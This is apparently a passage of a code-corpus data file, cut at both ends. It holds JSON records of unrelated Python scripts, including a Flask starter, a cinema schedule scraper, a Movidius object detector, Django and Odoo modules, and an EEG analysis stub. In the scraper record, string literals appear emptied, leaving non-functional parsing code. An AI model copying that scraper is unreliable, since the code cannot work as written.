'development'))\n\n with app.app_context():\n db.create_all()\n\n # create a development user\n if User.query.get(1) is None:\n print('ssssssssssssss')\n admin = User('farzin1', 'ehsanroman74@gmail.com')\n\n try:\n db.session.add(admin)\n db.session.commit()\n except Exception as e:\n print(e)\n app.run()\n","sub_path":"presenterHelper/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374538796","text":"#Даны 2 действительных числа a и b. 
Получить их сумму, разность и произведение.\n\na = int(input(\"Ведите любое действительное число: \"))\nb = int(input(\"Введите ещё одно действительное число: \"))\n\nsum_num = a+b\ndif_num = a-b\nmult_num = a*b\n\nprint(\"Сумма ваших чисел = \" + str(sum_num))\nprint(\"Разность ваших чисел = \" + str(dif_num))\nprint(\"А произведение ваших чисел = \" + str(mult_num))\n\n\n\n","sub_path":"task_1_1.py","file_name":"task_1_1.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429373830","text":"'''\nThis file specifies all requirements for each easy_deploy config command\n'''\n\nCOMMANDS = {\n 'installDebianPackage': {\n 'mandatory': ['source'],\n },\n 'installFile': {\n 'mandatory': ['localSource', 'remoteSource'],\n 'optional': {\n 'group': 'root',\n 'mode': '0644',\n 'owner': 'root',\n }\n },\n 'removeDebianPackage': {\n 'mandatory': ['source'],\n },\n}\n\nUNIVERSAL_OPTIONS = ['command', 'restarts']\n","sub_path":"easy_deploy/util/config_requirements_def.py","file_name":"config_requirements_def.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638369105","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport urllib2\nimport re\nimport pickle\nfrom PIL import Image\nfrom HTMLParser import HTMLParser\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()\n\ndef getFullUrls():\n page = urllib2.urlopen('http://28cinema.az/ru/').read()\n marker_1 = page.find('
Сегодня')\n marker_2 = page.find('')\n today = page[marker_1:marker_2]\n\n URLs = []\n while (today.find('') != -1):\n mark_1 = today.find('')\n mark_2 = today.find('',mark_1)\n\n temp_block = today[mark_1:mark_2]\n\n mark_3 = temp_block.find('')\n poster_marker_2 = page.find('')\n\n poster = page[poster_marker_1:poster_marker_2]\n\n post_marker_1 = poster.find('')\n marker_2 = page.find('',marker_1)\n\n description = page[marker_1 + 25 : marker_2 + 15]\n\n description = description.replace('','***').replace('','***')\n description = description.replace('','')\n description = description.replace('','***')\n #description = description.replace('','').replace('','') \n description = description.replace(' ','')\n description = description.replace('\n','')\n description = HTMLParser.HTMLParser().unescape(description.decode('utf-8'))\n description = description.replace('','111111111').replace('','222222222')\n description = strip_tags(description)\n description = description.replace('111111111','').replace('222222222','')\n\n time_hall_marker_1 = page.find('')\n time_hall_marker_2 = page.find('')\n\n time_hall = page[time_hall_marker_1:time_hall_marker_2]\n\n time_hall = time_hall[time_hall.find(''):time_hall.find('')]\n\n time_hall = time_hall.replace('','***').decode('utf-8')\n time_hall = strip_tags(time_hall)\n time_hall = time_hall.split('***')[1:]\n\n hallTimeDict = {}\n for item in time_hall:\n if item != '':\n time = item[:5]\n hall = '' + item[5:] + ':' + ''\n if hall not in hallTimeDict.keys():\n hallTimeDict[hall] = ' ' + time\n else:\n newItem = hallTimeDict[hall] + ' ' + time\n hallTimeDict[hall] = newItem\n\n time_hall = ''\n \n if len(hallTimeDict) == 1:\n key = hallTimeDict.keys()[0]\n temp = hallTimeDict[key]\n time_hall = key + temp\n else:\n counter = 0\n for item in hallTimeDict.keys():\n if (len(hallTimeDict) - counter) != 1:\n temp = hallTimeDict[item]\n time_hall += item + temp + ''\n counter += 1\n else:\n temp = hallTimeDict[item]\n time_hall += item + temp\n\n final = ''\n \n temp_order = description.split('***')\n\n name = temp_order[0]\n date = temp_order[1]\n country = temp_order[2]\n if \",\" in country:\n country = country[:country.find(\",\")]\n year = temp_order[3]\n director = temp_order[4]\n if \",\" in director:\n director = director[:director.find(\",\")]\n cast = temp_order[5]\n if (\",\" in cast) and (cast.count(\",\") >= 3):\n counter = 0\n mark_cast = 0\n for comma in range(cast.count(\",\")):\n counter += 1\n mark_cast = cast.find(\",\",mark_cast) + 1\n if counter == 3:\n cast = cast[:mark_cast - 1]\n break\n genre = temp_order[6]\n if (\",\" in genre) and (genre.count(\",\") > 1):\n counter = 0\n mark_genre = 0\n for comma in range(genre.count(\",\")):\n counter += 1\n mark_genre = genre.find(\",\",mark_genre) + 1\n if counter == 2:\n genre = genre[:mark_genre - 1]\n break\n duration = temp_order[7]\n restrictions = 'Возрастные ограничения: '.decode('utf-8') + re.sub(\"\\D\", \"\", temp_order[8]) + '+'\n description = 'Описание: '.decode('utf-8') + ''+ temp_order[9]\n\n date = date.replace(' ','').split('-')\n date = ('Дата показа: ' + 'c ').decode('utf-8') + date[0][:5]\n \n final = name + '***' + date + '' + time_hall + '***' + thumb + '***' + poster + '***' + country + '' + year + '' + duration + '' + director + '' + cast + '' + genre + '
    ' + restrictions + '***' + description\n \n movies += final + '$$$'\n \n movies = movies.encode('utf-8')\n f = open('28Today.html','w')\n f.write(movies)\n f.close()\n \ngetMovies()\n \n","sub_path":"Parsers [Python]/28Cinema/28Today.py","file_name":"28Today.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69215491","text":"import libreria\n\ndef econtratado():\n print(\" se eligio la opcion del empleado contratado\")\n empleado=libreria.pedir_nombre(\"ingrese nombre del empleado\")\n sueldo=libreria.pedir_numero(\"ingrese sueldo\",1,2000)\n if(sueldo>1500):\n print(\"tienes bonos adicionales\")\n contenido=empleado+\"-->\"+str(sueldo)+\"\\n\"\n libreria.guardar_datos(\"info.txt\",contenido,\"a\")\n print(\"los datos han sido guardados\")\ndef enombrado():\n print(\" se eligio la opcion del empleado nombrado\")\n empleado=libreria.pedir_nombre(\"ingrese nombre del empleado\")\n sueldo=libreria.pedir_numero(\"ingrese sueldo\",1,3000)\n if(sueldo>2500):\n print(\"tienes bonos adicionales\")\n contenido=empleado+\"-->\"+str(sueldo)+\"\\n\"\n libreria.guardar_datos(\"info.txt\",contenido,\"a\")\n print(\"los datos han sido guardados\")\n\ndef aempleado():\n print(\"se eligio la opcion agregar empleado\")\n opc=0\n max=3\n while(opc!=max):\n print(\"###############SUBMENU#############\")\n print(\"1. empleado contratado\")\n print(\"2. empleado nombrado\")\n print(\"3. salir\")\n print(\"###################################\")\n #elegir opciones del submenu\n opc=libreria.pedir_numero(\"ingrese opcion:\",1,3)\n #elaborar el mapeo de opciones del submenu\n if(opc==1):\n econtratado()\n if(opc==2):\n enombrado()\n\n#MENU PRINCIPAL------->\n\ndef aempresa():\n print(\"se eligio la opcion agregar empresa\")\nopc=0\nmax=3\nwhile(opc!=max):\n print(\"#############MENU############\")\n print(\"1. agregar empleado\")\n print(\"2. agregar empresa\")\n print(\"3. 
salir\")\n print(\"#############################\")\n #eligir opciones del menu\n opc=libreria.pedir_numero(\"ingrese opcion:\",1,3)\n #elaborar el mapeo de opciones\n if(opc==1):\n aempleado()\n if(opc==2):\n aempresa()\n\nprint(\"FIN DEL PROGRAMA\")\n","sub_path":"ejercicio13.py","file_name":"ejercicio13.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374317727","text":"import Program\nimport Cube2\nimport math3d\nfrom Texture import ImageTexture\n\n\nclass World(object):\n def __init__(self,filename):\n self.map = filename\n self.worldMat = 0\n self.data = []\n fp = open(filename,\"r\")\n for i in fp:\n self.data.append(i)\n self.c_list = []\n self.tex = ImageTexture(\"brick.png\")\n self.tex2 = ImageTexture(\"roof.png\")\n self.tex3 = ImageTexture(\"brickfloor.png\")\n self.c = Cube2.Cube2()\n\n\n\n\n\n def draw(self,prog):\n\n prog.setUniform(\"tex\",self.tex)\n for i in range(len(self.data)):\n for j in range(len(self.data[i])):\n if self.data[i][j] == \"*\":\n self.worldMat = math3d.translation([j*2,0,-i*2])\n prog.setUniform(\"worldMatrix\",self.worldMat)\n self.c.draw(prog)\n \n prog.setUniform(\"tex\",self.tex2)\n for i in range(len(self.data)):\n for j in range(len(self.data[i])):\n self.worldMat = math3d.translation([j*2,2,-i*2])\n prog.setUniform(\"worldMatrix\",self.worldMat)\n self.c.draw(prog)\n prog.setUniform(\"tex\",self.tex3)\n for i in range(len(self.data)):\n for j in range(len(self.data[i])):\n self.worldMat = math3d.translation([j*2,-2,-i*2])\n prog.setUniform(\"worldMatrix\",self.worldMat)\n self.c.draw(prog)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ETGG2801 Labs/lab14/World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165750400","text":"#!/usr/bin/python3\n\n# ****************************************************************************\n# Copyright(c) 2017 Intel Corporation.\n#\n# Code adapted by Mark West from the\n# https://github.com/movidius/ncappzoo/tree/master/apps/live-object-detector\n# project.\n#\n# License: MIT See LICENSE file in root directory.\n# ****************************************************************************\n\n# Detect objects on a LIVE camera feed using\n# Intel® Movidius™ Neural Compute Stick (NCS)\n\nimport os\nimport cv2\nimport sys\nimport numpy\nimport ntpath\nimport argparse\nimport time\n\nfrom imutils.video import FPS\nfrom imutils.video import VideoStream\n\nimport mvnc.mvncapi as mvnc\n\nfrom utils import visualize_output\nfrom utils import deserialize_output\n\n# Detection threshold: Minimum confidance to tag as valid detection\nCONFIDANCE_THRESHOLD = 0.60 # 60% confidant\n\n# Variable to store commandline arguments\nARGS = None\n\n# ---- Step 1: Open the enumerated device and get a handle to it -------------\n\ndef open_ncs_device():\n\n # Look for enumerated NCS device(s); quit program if none found.\n devices = mvnc.EnumerateDevices()\n if len( devices ) == 0:\n print( \"No devices found\" )\n quit()\n\n # Get a handle to the first enumerated device and open it\n device = mvnc.Device( devices[0] )\n device.OpenDevice()\n\n return device\n\n# ---- Step 2: Load a graph file onto the NCS device -------------------------\n\ndef load_graph( device ):\n\n # Read the graph file into a buffer\n with open( ARGS.graph, mode='rb' ) as f:\n blob = f.read()\n\n # Load the graph buffer into the NCS\n graph = 
device.AllocateGraph( blob )\n\n return graph\n\n# ---- Step 3: Pre-process the images ----------------------------------------\n\ndef pre_process_image( frame ):\n\n # Resize image [Image size is defined by choosen network, during training]\n img = cv2.resize( frame, tuple( ARGS.dim ) )\n\n # Convert RGB to BGR [OpenCV reads image in BGR, some networks may need RGB]\n if( ARGS.colormode == \"rgb\" ):\n img = img[:, :, ::-1]\n\n # Mean subtraction & scaling [A common technique used to center the data]\n img = img.astype( numpy.float16 )\n img = ( img - numpy.float16( ARGS.mean ) ) * ARGS.scale\n\n return img\n\n# ---- Step 4: Read & print inference results from the NCS -------------------\n\ndef infer_image( graph, img, frame ):\n\n # Load the image as a half-precision floating point array\n graph.LoadTensor( img, 'user object' )\n\n # Get the results from NCS\n output, userobj = graph.GetResult()\n\n # Get execution time\n inference_time = graph.GetGraphOption( mvnc.GraphOption.TIME_TAKEN )\n\n # Deserialize the output into a python dictionary\n output_dict = deserialize_output.ssd(\n output,\n CONFIDANCE_THRESHOLD,\n frame.shape )\n\n # Print the results (each image/frame may have multiple objects)\n print( \"I found these objects in \"\n + \" ( %.2f ms ):\" % ( numpy.sum( inference_time ) ) )\n\n for i in range( 0, output_dict['num_detections'] ):\n print( \"%3.1f%%\\t\" % output_dict['detection_scores_' + str(i)]\n + labels[ int(output_dict['detection_classes_' + str(i)]) ]\n + \": Top Left: \" + str( output_dict['detection_boxes_' + str(i)][0] )\n + \" Bottom Right: \" + str( output_dict['detection_boxes_' + str(i)][1] ) )\n\n # Draw bounding boxes around valid detections\n (y1, x1) = output_dict.get('detection_boxes_' + str(i))[0]\n (y2, x2) = output_dict.get('detection_boxes_' + str(i))[1]\n\n # Prep string to overlay on the image\n display_str = (\n labels[output_dict.get('detection_classes_' + str(i))]\n + \": \"\n + str( output_dict.get('detection_scores_' + str(i) ) )\n + \"%\" )\n\n frame = visualize_output.draw_bounding_box(\n y1, x1, y2, x2,\n frame,\n thickness=4,\n color=(255, 255, 0),\n display_str=display_str )\n print( '\\n' )\n\n # If a display is available, show the image on which inference was performed\n if 'DISPLAY' in os.environ:\n #displayImage = cv2.resize(frame, tuple([960, 720]))\n displayImage = frame\n cv2.imshow( 'NCS Improved live inference', displayImage )\n\n# ---- Step 5: Unload the graph and close the device -------------------------\n\ndef close_ncs_device( device, graph ):\n graph.DeallocateGraph()\n device.CloseDevice()\n\n cv2.destroyAllWindows()\n\n# ---- Main function (entry point for this script ) --------------------------\n\ndef main():\n\n device = open_ncs_device()\n graph = load_graph( device )\n\n vs = VideoStream(usePiCamera=True, resolution=(640, 480)).start()\n time.sleep(1)\n fps = FPS().start()\n\n # Main loop: Capture live stream & send frames to NCS\n while True:\n try:\n frame = vs.read()\n img = pre_process_image( frame )\n infer_image( graph, img, frame )\n\n # Display the frame for 5ms, and close the window so that the next\n # frame can be displayed. Close the window if 'q' or 'Q' is pressed.\n if( cv2.waitKey( 5 ) & 0xFF == ord( 'q' ) ):\n fps.stop()\n break\n\n fps.update()\n\n # Allows graceful exit using ctrl-c (handy for headless mode). 
\n except KeyboardInterrupt:\n fps.stop()\n break\n\n print(\"Elapsed time: \" + str(fps.elapsed()))\n print(\"Approx FPS: :\" + str(fps.fps()))\n\n close_ncs_device( device, graph )\n vs.stop()\n\n# ---- Define 'main' function as the entry point for this script -------------\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(\n description=\"Detect objects on a LIVE camera feed using \\\n Intel® Movidius™ Neural Compute Stick.\" )\n\n parser.add_argument( '-g', '--graph', type=str,\n default='../../caffe/SSD_MobileNet/graph',\n help=\"Absolute path to the neural network graph file.\" )\n\n parser.add_argument( '-l', '--labels', type=str,\n default='../../caffe/SSD_MobileNet/labels.txt',\n help=\"Absolute path to labels file.\" )\n\n parser.add_argument( '-M', '--mean', type=float,\n nargs='+',\n default=[127.5, 127.5, 127.5],\n help=\"',' delimited floating point values for image mean.\" )\n\n parser.add_argument( '-S', '--scale', type=float,\n default=0.00789,\n help=\"Absolute path to labels file.\" )\n\n parser.add_argument( '-D', '--dim', type=int,\n nargs='+',\n default=[300, 300],\n help=\"Image dimensions. ex. -D 224 224\" )\n\n parser.add_argument( '-c', '--colormode', type=str,\n default=\"bgr\",\n help=\"RGB vs BGR color sequence. This is network dependent.\" )\n\n ARGS = parser.parse_args()\n\n # Load the labels file\n labels =[ line.rstrip('\\n') for line in\n open( ARGS.labels ) if line != 'classes\\n']\n\n\n main()\n\n# ==== End of file ===========================================================\n","sub_path":"live-object-detector-universal.py","file_name":"live-object-detector-universal.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93659254","text":"from math import radians,cos,hypot\nimport matplotlib.pyplot as plt\nfrom random import shuffle\n\n\nclass Destination(object):\n \"\"\"A destination to be visited on the route\"\"\"\n\n def __init__(self, latitude, longitude, reference):\n self.latitude = latitude\n self.longitude = longitude\n self.reference = reference\n\n def __repr__(self):\n return self.reference + \" at \" + str(self.latitude) + \", \" + str(self.longitude)\n\n\nclass Route(object):\n \"\"\"A sequence of destinations forming the route\"\"\"\n\n def __init__(self, destinations):\n self.destinations = destinations\n\n def edge_length(self, destination_a, destination_b):\n \"\"\"Returns the distance in kilometres between two destinations\"\"\"\n \n # Convert to Radians\n latitude_a = radians(destination_a.latitude)\n longitude_a = radians(destination_a.longitude)\n latitude_b = radians(destination_b.latitude)\n longitude_b = radians(destination_b.longitude)\n\n # Use Equirectangular Aprroximation for distance\n x = (longitude_a-longitude_b) * cos((latitude_a+latitude_b)/2)\n y = latitude_a - latitude_b\n d = hypot(x,y)\n\n # Convert to kilometres by multiplying by earth radius\n d = d*6371\n\n return d\n\n def length(self):\n \"\"\"Returns the total length of the current route in kilometres\"\"\"\n\n d = 0\n\n # Sum the distance between each destination in order\n for a, b in zip(self.destinations, self.destinations[1:]):\n d += self.edge_length(a, b);\n\n return d\n\n def swap(self, a, b):\n \"\"\"Swap the order of two destinations on the route\"\"\"\n self.destinations[b], self.destinations[a] = self.destinations[a], self.destinations[b]\n\n def shuffle(self):\n \"\"\"Shuffle the route order (but not the first)\"\"\"\n\n first = 
self.destinations.pop(0)\n shuffle(self.destinations)\n self.destinations.insert(0, first)\n\n\n def plot(self):\n \"\"\"Draw the route as a Matplotlib figure\"\"\"\n\n x = list()\n y = list()\n\n for destination in self.destinations:\n x.append(destination.longitude)\n y.append(destination.latitude)\n\n plt.clf()\n plt.plot(x,y,'o-')\n plt.xlabel('Longitude')\n plt.ylabel(\"Latitude\")\n plt.title(\"Total Length=\" + str(round(self.length(),2)) + \"km\")\n plt.draw()\n\n\n\n \n\n","sub_path":"travellingstudent/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228106270","text":"import logging\nimport ipaddress\n\n\nimport synapse.exc as s_exc\n\nimport synapse.lib.stormtypes as s_stormtypes\n\nlogger = logging.getLogger(__name__)\n\n@s_stormtypes.registry.registerLib\nclass LibIpv6(s_stormtypes.Lib):\n '''\n A Storm Library for providing ipv6 helpers.\n '''\n _storm_locals = (\n {'name': 'expand',\n 'desc': '''\n Convert a IPv6 address to its expanded form.'\n\n Notes:\n The expanded form is also sometimes called the \"long form\" address.\n\n Examples:\n Expand a ipv6 address to its long form::\n\n $expandedvalu = $lib.inet.ipv6.expand('2001:4860:4860::8888')\n ''',\n 'type': {'type': 'function', '_funcname': '_expand',\n 'args': (\n {'name': 'valu', 'type': 'str', 'desc': 'IPv6 Address to expand', },\n ),\n 'returns': {'type': 'str', 'desc': 'The expanded form.', }}},\n )\n _storm_lib_path = ('inet', 'ipv6')\n\n def getObjLocals(self):\n return {\n 'expand': self._expand,\n }\n\n async def _expand(self, valu):\n valu = await s_stormtypes.tostr(valu)\n valu = valu.strip()\n try:\n ipv6 = ipaddress.IPv6Address(valu)\n return ipv6.exploded\n except ipaddress.AddressValueError as e:\n mesg = f'Error expanding ipv6: {e} for valu={valu}'\n raise s_exc.StormRuntimeError(mesg=mesg, valu=valu)\n","sub_path":"synapse/lib/stormlib/ipv6.py","file_name":"ipv6.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376868469","text":"class TV:\n def __init__(self):\n self.ligada = False\n self.canal = 5\n\n def power(self):\n if self.ligada:\n self.ligada = False\n else:\n self.ligada = True\n def aum_canal(self):\n if self.ligada:\n self.canal += 1\n def dim_canal(self):\n if self.ligada:\n self.canal -=1\n\n\n\n\ntelevisao = TV ()\nprint(\"A TV está ligada: {}\".format(televisao.ligada))\ntelevisao.power()\nprint(\"A TV está ligada: {}\".format(televisao.ligada))\ntelevisao.power()\nprint(\"A TV está ligada: {}\".format(televisao.ligada))\nprint(\"Canal: {}\" .format(televisao.canal))\ntelevisao.power()\ntelevisao.aum_canal()\ntelevisao.aum_canal()\nprint(\"Canal: {}\".format(televisao.canal))\ntelevisao.dim_canal()\nprint(\"Canal: {}\". 
format(televisao.canal))","sub_path":"Curso de PY/pythonProject1/Aula7_TV.py","file_name":"Aula7_TV.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615146323","text":"import re, os\nimport globals\n\n\ndef setup_database_settings(settings):\n ctx = {'name': globals.short}\n settings = re.sub(r\"'ENGINE': 'django.db.backends.'\", \"'ENGINE': 'django.db.backends.postgresql_psycopg2'\", settings)\n settings = re.sub(r\"'NAME': ''\", \"'NAME': '%(name)s'\"%ctx, settings)\n settings = re.sub(r\"'USER': ''\", \"'USER': '%(name)s'\"%ctx, settings)\n\n return settings\n\n\ndef setup_media_settings(settings):\n settings = re.sub(r\"MEDIA_ROOT = ''\", r\"MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media').replace('\\\\\\\\', '/')\", settings)\n settings = re.sub(r\"MEDIA_URL = ''\", \"MEDIA_URL = '/media/'\", settings)\n return settings\n\n\ndef setup_static_settings(settings):\n return re.sub(r\"STATIC_ROOT = ''\", r\"STATIC_ROOT = os.path.join(os.path.dirname(__file__), 'static').replace('\\\\\\\\', '/')\", settings)\n\n\ndef setup_installed_apps(settings):\n new_apps = '''# 'django.contrib.admindocs',\n 'lightnav',\n 'south',\n'''\n settings = re.sub(r\"# 'django.contrib.admindocs',\", new_apps, settings)\n return settings\n\n\ndef setup_settings():\n with open(globals.settings_path) as settings_file:\n settings = settings_file.read()\n\n settings = 'import os, sys\\n\\n' + settings\n settings = setup_database_settings(settings)\n settings = setup_media_settings(settings)\n settings = setup_static_settings(settings)\n\n with open(globals.settings_path, 'w') as settings_file:\n settings_file.write(settings)\n\n\ndef setup_db_scripts():\n scripts = [\n 'init.sql',\n ]\n\n for script in scripts:\n with open(os.path.join(globals.db_path, script)) as db_file:\n sql = db_file.read()\n\n sql = re.sub(r'', globals.short, sql)\n\n with open(os.path.join(globals.db_path, script), 'w') as db_file:\n db_file.write(sql)\n","sub_path":"djangoproject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546135343","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# copyright (c) 2013-2015 marcos organizador de negocios srl http://marcos.do\n# write by eneldo serrata (eneldo@marcos.do)\n#\n# this program is free software: you can redistribute it and/or modify\n# it under the terms of the gnu affero general public license as\n# published by the free software foundation, either version 3 of the\n# license, or (at your option) any later version.\n#\n# this program is distributed in the hope that it will be useful,\n# but without any warranty; without even the implied warranty of\n# merchantability or fitness for a particular purpose. see the\n# gnu affero general public license for more details.\n#\n# you should have received a copy of the gnu affero general public license\n# along with this program. 
if not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\nimport time\nfrom datetime import datetime\nfrom dateutil import relativedelta\nfrom openerp import models, fields, api, exceptions, _\nfrom openerp.exceptions import UserError, ValidationError\nimport base64\n\nclass dgiisalenullreport(models.Model):\n\n _name = \"dgii.sale.null.report\"\n\n company_id = fields.Many2one(\"res.company\", required=True, default=lambda s: s.env.user.company_id.id, readonly=True, string=u\"Comercio\", help=\"\")\n date_from = fields.Date('Fecha inicial', required=True, track_visibility='onchange')\n date_to = fields.Date('Fecha final', required=True, track_visibility='onchange')\n cantidad_registros = fields.Integer(\"Cantidad de registros\", readonly=True)\n report = fields.Binary(\"Descargar archivo\", readonly=True)\n report_name = fields.Char(u\"Nombre de reporte\", size=40, readonly=True)\n line_ids = fields.One2many(\"dgii.sale.null.report.line\", \"sale_null_report_id\", readonly=True)\n\n _defaults = {\n 'date_from': lambda *a: time.strftime('%Y-%m-01'),\n 'date_to': lambda *a: str(datetime.now() + relativedelta.relativedelta(months=+1, day=1, days=-1))[:10],\n }\n\n @api.one\n @api.constrains('date_from', 'date_to')\n def _check_dates(self):\n if self.date_from > self.date_to:\n raise ValidationError(\n _(\"Date from '%s' must be before Date to '%s' \") % (self.date_from, self.date_to))\n\n @api.multi\n def generate_file(self):\n #import pdb; pdb.set_trace()\n invoice_ids = self.env[\"account.invoice\"].search([(\"company_id\",\"=\",self.company_id.id),\n (\"date_invoice\",\">=\",self.date_from),\n (\"date_invoice\", \"<=\", self.date_to),\n (\"type\", \"in\", [\"out_invoice\", \"out_refund\"]),\n (\"state\", \"in\", [\"cancel\"])])\n self.cantidad_registros = len([rec.amount_total for rec in invoice_ids])\n lines = []\n for inv in invoice_ids:\n line = []\n #index 0 --> fiscal receipt (NCF) number\n line.append(inv.move_name)\n #index 1 --> receipt date\n line.append(inv.date_invoice)\n #index 2 --> cancellation type\n line.append(inv.cancel_reason_id.code)\n\n lines.append(line)\n\n self.line_ids.unlink()\n lines_dict_list = []\n for line in lines:\n #import pdb; pdb.set_trace()\n lines_dict_list.append([0, False, {\"sale_null_report_id\": self.id,\n u\"numero_comprobante_fiscal\": line[0],\n u\"fecha_comprobante\": line[1],\n u\"tipo_de_anulacion\": line[2],\n }])\n\n self.write({\"line_ids\": lines_dict_list})\n path = '/tmp/608{}.txt'.format(self.company_id.vat)\n f = open(path,'w')\n header_str = \"\"\n header_str += \"608\"\n header_str += self.company_id.vat.rjust(11)\n\n periodo = (self.date_to).split(\"-\")\n header_str += periodo[0]+periodo[1]\n header_str += str(self.cantidad_registros).zfill(6)\n\n f.write(header_str + '\\n')\n\n for line in lines_dict_list:\n #import pdb; pdb.set_trace()\n line_str = \"\"\n line_str += line[2]['numero_comprobante_fiscal']\n fecha = line[2]['fecha_comprobante'].split(\"-\")\n line_str += fecha[0]+fecha[1]+fecha[2]\n line_str += line[2]['tipo_de_anulacion']\n f.write(line_str+ '\\n')\n\n f.close()\n f = open(path,'rb')\n report = base64.b64encode(f.read())\n f.close()\n report_name = 'dgii_f_608_' + self.company_id.vat + '_' + periodo[0]+periodo[1] + '.txt'\n self.write({'report': report, 'report_name': report_name})\n return True\n\n\nclass dgiisalereportline(models.Model):\n _name = \"dgii.sale.null.report.line\"\n\n sale_null_report_id = fields.Many2one(\"dgii.sale.null.report\")\n numero_comprobante_fiscal = fields.Char(u\"Número comprobante fiscal\", size=19)\n fecha_comprobante = fields.Char(u\"Fecha comprobante\")\n tipo_de_anulacion = fields.Char(u\"Tipo de anulacion\")","sub_path":"odoo-extra-addons/oca/goeasy_addons/goeasy_ncf/dgii_608/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95615814","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import api, models, fields\nimport openerp.addons.decimal_precision as dp\n\nclass product_product(models.Model):\n _inherit = \"product.product\"\n\n of_frais_port = fields.Float(string='Frais de port', digits_compute=dp.get_precision('Product Price'), help=\"Frais de port\")\n\n\nclass of_product_template(models.Model):\n _inherit = \"product.template\"\n\n of_frais_port = fields.Float('Frais de port', compute='_compute_of_frais_port', digits_compute=dp.get_precision('Product Price'),\n inverse='_set_of_frais_port', store=True,\n help=u\"Frais de port.\\nSi vous le modifier ici, il sera imposé à toutes les variantes.\\nPour ne le modifier que pour une variante, modifiez le dans les variantes d'articles.\")\n\n @api.depends('product_variant_ids', 'product_variant_ids.of_frais_port')\n def _compute_of_frais_port(self):\n # Shipping cost of the product template: if every variant has the same shipping cost, use it; otherwise zero.\n for template in self:\n frais_port = \"\"\n identique = True\n for variantes in template.product_variant_ids:\n if frais_port == \"\":\n frais_port = variantes.of_frais_port\n elif frais_port != variantes.of_frais_port:\n template.of_frais_port = 0.0\n identique = False\n break\n if identique:\n template.of_frais_port = frais_port\n\n @api.one\n def _set_of_frais_port(self):\n # Setting the shipping cost from the product template: apply it to every variant.\n self.product_variant_ids.write({'of_frais_port': self.of_frais_port})\n\n\nclass of_product_product(models.Model):\n _inherit = \"product.product\"\n\n @api.model\n def _add_missing_default_values(self, values):\n # Default a new variant's product reference (default_code) to the template's when creating a variant.\n if 'product_tmpl_id' in values and values['product_tmpl_id']:\n values['default_code'] = self.env['product.template'].browse(values['product_tmpl_id']).default_code\n return super(of_product_product, self)._add_missing_default_values(values)\n","sub_path":"of_product/models/of_product.py","file_name":"of_product.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202623190","text":"import mne\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom functions import mne_helpers as mnehelp\nfrom functions import mne_plot_helpers as mneplothelp\nfrom functions import mne_stats as mnestats\n\nfrom mne.stats import permutation_cluster_test\nfrom mne.time_frequency import psd_multitaper, tfr_multitaper, tfr_stockwell, tfr_morlet\n\nbase_path = \"D:\\\\OneDrive\\\\FGU\\\\iEEG\\\\p142\\\\\"\nbase_path = \"U:\\\\OneDrive\\\\FGU\\\\iEEG\\\\p142\\\\\"\n\npath_original_vr = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_250.mat\"\npath_perhead_vr = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_perHeadbox_250.mat\"\npath_perelectrode_vr = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_perElectrode_250.mat\"\npath_bipolar_vr = base_path + 
